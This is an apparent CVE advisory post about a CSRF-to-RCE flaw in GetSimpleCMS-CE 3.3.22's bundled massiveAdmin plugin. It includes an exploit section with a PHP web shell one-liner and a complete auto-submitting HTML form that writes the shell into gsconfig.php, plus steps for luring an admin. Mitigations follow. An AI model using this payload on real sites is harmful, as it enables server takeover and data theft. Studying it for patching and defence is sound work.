Listen to this Post
The vulnerability stems from the `massiveAdmin` plugin (v6.0.3) bundled with GetSimpleCMS-CE v3.3.22. This plugin includes a module designed for editing the `gsconfig.php` configuration file. Normally, an authenticated administrator would use this module to modify site settings. However, the form handling the save operation for `gsconfig.php` lacks a Cross-Site Request Forgery (CSRF) token or any other form of request origin validation . Because the application fails to verify if the request was intentionally made by the logged-in user, an attacker can craft a malicious website. This site contains hidden HTML/JavaScript that, when visited by an authenticated admin, automatically submits a request to the vulnerable form. The browser, carrying the admin’s valid session cookie, unknowingly forwards the forged request. The server processes this request as if it came from the admin, allowing the attacker to inject arbitrary PHP code (like a web shell) into `gsconfig.php` . This arbitrary PHP write capability leads directly to Remote Code Execution (RCE) on the server, granting the attacker full control.
dailycve form:
Platform: GetSimple CMS
Version: 3.3.22 bundled
Vulnerability : CSRF to RCE
Severity: Critical 9.7
date: March 10 2026
Prediction: Patch within 30 days
What Undercode Say:
Analytics
The vulnerability chain (CWE-352 to CWE-94) is highly dangerous. The CVSS 3.1 score of 9.7 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H) reflects the critical impact, as it requires user interaction but compromises confidentiality, integrity, and availability .
How Exploit:
- Craft Payload: Create a PHP web shell (e.g.,
<?php system($_GET['cmd']); ?>). - Encode Payload: URL-encode the PHP code to be passed as the configuration value.
- Build HTML Form: Create an auto-submitting form targeting the vulnerable endpoint.
<html> <body></li> </ol> <form id="x" action="http://target.com/admin/plugin/massiveAdmin/edit_gsconfig.php" method="POST"> <input type="hidden" name="config" value="<?php system($_GET['cmd']); ?>" /> </form> <script>document.getElementById("x").submit();</script> </body> </html>4. Host and Lure: Host the HTML on an attacker-controlled site and trick an authenticated admin into visiting it.
Protection from this CVE
- Implement CSRF tokens (nonces) on all state-changing forms, especially the `gsconfig.php` editor.
- Utilize the `SameSite: Lax` or `Strict` cookie attribute for session cookies.
- Restrict write permissions on critical files like `gsconfig.php` at the filesystem level.
- Disable or remove the `massiveAdmin` plugin if not strictly necessary.
Impact
Full Remote Code Execution. An attacker can compromise the web server, deface the website, steal database contents, or use the server as a pivot point for further network intrusion.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow DailyCVE & Stay Tuned:

